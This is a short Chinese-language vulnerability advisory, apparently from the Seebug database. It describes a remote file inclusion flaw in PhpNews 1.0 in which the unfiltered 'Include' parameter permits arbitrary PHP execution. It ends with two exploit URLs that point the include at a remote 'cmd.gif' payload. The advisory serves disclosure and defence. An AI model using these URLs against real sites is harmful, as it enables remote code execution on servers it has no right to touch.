PhpNews远程文件包含漏洞

2006-12-14T00:00:00
ID SSV:919
Type seebug
Reporter Root
Modified 2006-12-14T00:00:00

Description

PhpNews是一款基于PHP的新闻管理程序。 PhpNews不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于多个脚本对用户提交的'Include'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。

PHPNews PHPNews 1.0 目前没有解决方案提供,请关注以下链接: <a href="http://newsphp.sourceforge.net/index.php" target="_blank">http://newsphp.sourceforge.net/index.php</a>

                                        
                                            
                                                http://www.example.com/[Path]/Include/lib.inc.php3?Include=http://cmd.gif?
http://www.example.com]/[Path]/Include/variables.php3?Include=http://cmd.gif?